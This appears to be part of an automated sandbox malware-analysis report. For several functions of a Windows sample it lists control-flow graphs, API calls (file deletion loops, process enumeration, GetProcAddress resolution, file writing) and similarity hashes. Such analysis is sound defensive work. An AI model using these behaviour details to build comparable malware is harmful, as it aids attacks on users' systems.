                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                            • String ID: #~\
                                                                                                                                                                                                            • API String ID: 54951025-95464956
                                                                                                                                                                                                            • Opcode ID: 78b4514fca032ac38f2048c54f6be1c7d5ae35206958cb6b6a394fc72ff63e13
                                                                                                                                                                                                            • Instruction ID: f5e059731d034deb7662b2b573f59cf7ee5e479a09cbcd0b11f0d708ed3ccc74
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78b4514fca032ac38f2048c54f6be1c7d5ae35206958cb6b6a394fc72ff63e13
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58720E76A04205CFC304DF65FC866A53BF5FB98312B51421AE845DBEB0EB708AE5CB91
                                                                                                                                                                                                            Function 00169580 Relevance: 7.7, APIs: 5, Instructions: 220filesleepCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1123 169580-1695a3 1124 169963-169966 1123->1124 1125 1695a9-1695d1 1123->1125 1126 1695d3 1125->1126 1127 1695dd-1695f2 1125->1127 1126->1127 1128 1695f4 1127->1128 1129 1695fe-169707 call 152a20 call 14d500 Sleep call 14c580 call 142f90 1127->1129 1128->1129 1138 169731-169747 1129->1138 1139 169709-169721 1129->1139 1141 16974d-169773 call 14c580 1138->1141 1140 169723-16972f 1139->1140 1139->1141 1140->1141 1144 169795-1697d4 call 151bb0 FindFirstFileA 1141->1144 1145 169775-16978f 1141->1145 1148 1697d6-169802 1144->1148 1149 169808-16980a 1144->1149 1145->1144 1148->1149 1150 169902-169962 call 16a7e0 1149->1150 1151 169810-16982b 1149->1151 1150->1124 1152 169830-16985c 1151->1152 1154 169864-1698d3 call 14c580 DeleteFileA FindNextFileA 1152->1154 1155 16985e 1152->1155 1154->1152 1159 1698d9-1698fb FindClose 1154->1159 1155->1154 1159->1150
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • Sleep.KERNELBASE(000003E8,00000001), ref: 00169679
                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,?), ref: 001697B8
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 001698A9
                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,?), ref: 001698CB
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 001698E4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteFirstNextSleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1528862845-0
                                                                                                                                                                                                            • Opcode ID: c949ea3f2e6a2350f6bf94a409c1f545a5a5e425c8513c22f02f1df68cce28f4
                                                                                                                                                                                                            • Instruction ID: 4b7ec12d77ae79b803ec06132f6e0ec141d2224b252409d7c9888dc2bb5e892e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c949ea3f2e6a2350f6bf94a409c1f545a5a5e425c8513c22f02f1df68cce28f4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3914375901205DFC714DF34FC86AA53BB9FB98704B40861AE94687E70EB348AE1CF91
                                                                                                                                                                                                            Function 00150920 Relevance: 4.8, APIs: 3, Instructions: 254libraryloaderencryptionCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1596 150920-150943 1597 150945-150958 1596->1597 1598 15095e-15099c 1596->1598 1597->1598 1599 15099e-1509a8 1598->1599 1600 1509aa-1509b7 1598->1600 1601 1509be-150a34 call 163110 1599->1601 1600->1601 1604 150bd4-150bea 1601->1604 1605 150a3a-150aa5 call 142f90 GetProcAddress 1601->1605 1607 150bec-150bf4 1604->1607 1608 150bfa-150c01 1604->1608 1612 150aa7-150ab1 1605->1612 1613 150ab3-150ac0 1605->1613 1607->1608 1610 150c03-150c18 CryptGenRandom 1608->1610 1611 150c58-150c7c 1608->1611 1610->1611 1614 150c1a-150c52 1610->1614 1615 150c94 1611->1615 1616 150c7e-150c92 1611->1616 1617 150ac7-150b44 call 142f90 call 151bb0 GetProcAddress call 151bb0 1612->1617 1613->1617 1614->1611 1618 150c9e-150ca6 1615->1618 1616->1618 1636 150b46-150b4d 1617->1636 1637 150b9d-150bb7 1617->1637 1620 150d64-150da2 call 16fcc0 1618->1620 1621 150cac-150cda call 142860 * 2 1618->1621 1632 150cdc-150d02 1621->1632 1633 150d08-150d58 call 142860 * 2 1621->1633 1632->1633 1633->1620 1645 150d5a 1633->1645 1636->1637 1640 150b4f-150b5b 1636->1640 1638 150bbd-150bd1 1637->1638 1638->1604 1642 150b62-150b64 1640->1642 1642->1637 1644 150b66-150b9b 1642->1644 1644->1638 1645->1620
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00000000), ref: 00150A8A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00000000), ref: 00150B05
                                                                                                                                                                                                            • CryptGenRandom.ADVAPI32(00000000,00000004,00000000,00000000), ref: 00150C10
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$CryptRandom
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 646182245-0
                                                                                                                                                                                                            • Opcode ID: 1e3089d542ef6e99337a3c23b6dd01c75f5a8e89c589ef8a6d3e53cd1a5e9817
                                                                                                                                                                                                            • Instruction ID: 9a44081cad21fa68937cdfac915acb2760fe07f4e57f5f8e993902d14031d0fe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e3089d542ef6e99337a3c23b6dd01c75f5a8e89c589ef8a6d3e53cd1a5e9817
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AB176B2A00315DBC315DFA9FC85A253BB4FB58715B01422EE8569BEB8E33089D5CF85
                                                                                                                                                                                                            Function 00152120 Relevance: 6.2, APIs: 4, Instructions: 207processCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1172 152120-15218a 1173 152196-1521f8 CreateToolhelp32Snapshot 1172->1173 1174 15218c 1172->1174 1175 1521fe-152239 1173->1175 1176 1524b9-1524fd call 16a7e0 1173->1176 1174->1173 1178 15224f-152274 Process32First 1175->1178 1179 15223b-152248 1175->1179 1181 15240d-15244e FindCloseChangeNotification 1178->1181 1182 15227a 1178->1182 1179->1178 1183 152450-152469 1181->1183 1184 15246b-152497 1181->1184 1185 152280-152292 1182->1185 1183->1176 1184->1176 1188 152499-1524b2 1184->1188 1186 152294-1522a0 1185->1186 1187 1522a6-1522ce call 1413e0 1185->1187 1186->1187 1191 1522d0-1522e6 1187->1191 1192 15230f 1187->1192 1188->1176 1193 152319-152344 call 14a4e0 call 16b260 1191->1193 1194 1522e8-15230d 1191->1194 1192->1193 1199 152346-152396 Process32Next 1193->1199 1200 15239e-1523ac 1193->1200 1194->1193 1199->1185 1201 15239c 1199->1201 1202 1523d2-152401 1200->1202 1203 1523ae-1523cc 1200->1203 1201->1181 1202->1181 1204 152403 1202->1204 1203->1202 1204->1181
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001521D0
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00152257
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00152384
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00152426
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3243318325-0
                                                                                                                                                                                                            • Opcode ID: df6481a2fc8bef7960ef4df4ab32a0a47e318a250fa21f99609356e2b18cc9b3
                                                                                                                                                                                                            • Instruction ID: 59af42ebffe2aa8119f653f5c99daec505b1ab9a5abd3c0c54f61812807c80c2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: df6481a2fc8bef7960ef4df4ab32a0a47e318a250fa21f99609356e2b18cc9b3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95913372A00314CFC305DF25FC89AA53BB4FBA9310F15820AD84296EB4EB7486E9CF51
                                                                                                                                                                                                            Function 00151D90 Relevance: 4.7, APIs: 3, Instructions: 187fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1646 151d90-151e21 call 175df0 call 163110 1651 151e23-151e4b call 16fcc0 1646->1651 1652 151e4c-151e91 CreateFileA 1646->1652 1654 151ed1-151ef0 1652->1654 1655 151e93-151ed0 call 16fcc0 1652->1655 1658 151ef2-151f06 1654->1658 1659 151f0c-151f18 1654->1659 1658->1659 1661 151f20-151f3e 1659->1661 1662 151f40-151f57 1661->1662 1663 151f59-151f85 1661->1663 1664 151f8b-152063 call 14b620 call 16ff30 WriteFile 1662->1664 1663->1664 1664->1661 1669 152069-15209c FindCloseChangeNotification call 16fcc0 1664->1669 1671 1520a1-1520b6 1669->1671 1672 1520c2-1520ca 1671->1672 1673 1520b8 1671->1673 1673->1672
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00163110: WaitForSingleObject.KERNEL32(00000708,00004E20,?,00150A18,00000114,00000000,00000000,?,0015126B,?,001625B4,?,00000708,00000000), ref: 001631AD
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,-0000004B,00000009), ref: 00151E7B
                                                                                                                                                                                                              • Part of subcall function 0016FCC0: ReleaseMutex.KERNEL32(00150D8E,?,00150D8E,00000114,00000000), ref: 0016FCE9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFileMutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1564016613-0
                                                                                                                                                                                                            • Opcode ID: 37c28564cba5a741b0206745fee1ea3b11a0d511c04560e6312677a5e70a4794
                                                                                                                                                                                                            • Instruction ID: 4c38f319b3cbb9f489e097b241f6d020158641a4adba2a40a042d69e04128246
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37c28564cba5a741b0206745fee1ea3b11a0d511c04560e6312677a5e70a4794
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D71F472611204DFC304DF64FC89A6A3BB9FB98315F418259E80697EB4DB709AE5CF81
                                                                                                                                                                                                            Function 00163CF0 Relevance: 1.6, APIs: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1924 163cf0-163d33 1925 163d35-163d3f 1924->1925 1926 163d41-163d51 1924->1926 1927 163d58-163e30 call 14e430 call 142f90 call 14c580 call 151bb0 CreateFileA 1925->1927 1926->1927 1936 163e32-163e51 1927->1936 1937 163e53-163e64 1927->1937 1938 163e8a-163e9d 1936->1938 1939 163e66 1937->1939 1940 163e70-163e84 1937->1940 1941 163ec2-163eca 1938->1941 1942 163e9f-163ec0 1938->1942 1939->1940 1940->1938 1943 163ed0-163ef7 call 16a7e0 1941->1943 1942->1943
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00163E0B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                            • Opcode ID: 6067148dacfaaca10ff7886e7f0ae1bcb1f024ef822556e2d9005961edea5d71
                                                                                                                                                                                                            • Instruction ID: 5397fee7e2b920637bbddda1b32943dd6f83130f7f52fca8c039dd05e7acc12c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6067148dacfaaca10ff7886e7f0ae1bcb1f024ef822556e2d9005961edea5d71
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E412372A10314DBD314AF20FC82BA13BB1F7A4710F524219E651E6DB5FB709AE1CB91
                                                                                                                                                                                                            Function 0014A4E0 Relevance: 1.3, APIs: 1, Instructions: 33stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • lstrlen.KERNEL32(00152325,00000000,?,00152325,?), ref: 0014A4FE
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1659193697-0
                                                                                                                                                                                                            • Opcode ID: cb5344382e32d7667f7ad6ad5330b9229be933540e370482a7f9664a0f35c812
                                                                                                                                                                                                            • Instruction ID: 1e7763b11c5200db3712b05806d599bd6850ffa4db8f98c1eab530ff360ec9b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb5344382e32d7667f7ad6ad5330b9229be933540e370482a7f9664a0f35c812
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF0CD71600220EFC3025F21FD4D5663BB8FF893613840512E48A86974E77489E2DFD2